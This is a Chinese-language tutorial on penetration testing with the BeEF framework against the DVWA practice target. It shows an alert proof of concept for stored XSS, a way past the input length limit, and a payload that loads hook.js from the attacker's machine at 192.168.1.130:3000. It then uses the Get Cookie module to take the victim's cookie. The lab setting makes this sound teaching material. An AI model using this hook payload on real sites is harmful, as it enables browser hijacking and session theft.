BeEF-XSS渗透框架的使用

BeEF-XSS渗透框架的使用

将DVWA靶场安装包解压到根目录

https://pic.imgdb.cn/item/64de1770661c6c8e54495d72.jpg

修改配置文件

安装BeEF:sudo apt-get install beef-xss

运行BeEF:beef-xss

ifconfig查看KALI机的IP

在真机上访问BeEF的Web UI: http://192.168.1.130:3000/ui/panel

在真机上访问BeEF要把环回地址127.0.0.1改成KALI机的IP

BeEF的默认用户名密码为beef、beef

首次登录会要求改密码,若改完的密码忘了可以通过vim /etc/beef-xss/config.yaml查看或修改

首先设置DVWA靶场的难度

来到XSS (Stored)——存储型XSS关卡

在留言板Name那栏输入poc:<script>alert(1)</script>,发现字符数超过上限

解决方法:F12打开开发者模式

https://pic.imgdb.cn/item/64de3fe8661c6c8e54f9dc9b.jpg

将限制的数量改大些

改好后输入poc

页面出现弹窗,说明存在XSS漏洞

之后刷新页面,还是出现弹窗,说明属于存储型XSS

已经用poc确定存储型XSS存在,接下来就是利用BeEF渗透测试框架来利用这个漏洞

在留言板Name那栏输入payload:<script src="http://192.168.1.130:3000/hook.js"></script>(记得先通过开发者模式修改字符数限制)

当我们访问这个界面时恶意脚本就被执行了

去BeEF的Web UI,发现真机已经在"上线"列表中了

打开命令界面

https://pic.imgdb.cn/item/64de44b0661c6c8e540f0558.jpg

  • 绿色:对目标主机生效并且不可见(不会被发现)
  • 橙色:对目标主机生效但可能可见(可能被发现)
  • 灰色:在目标主机上的效果有待验证
  • 红色:对目标主机不生效

例如"Get Cookie"模块

获得受害者在那个被利用了XSS漏洞网站的Cookie

https://pic.imgdb.cn/item/64de457d661c6c8e54119a7c.jpg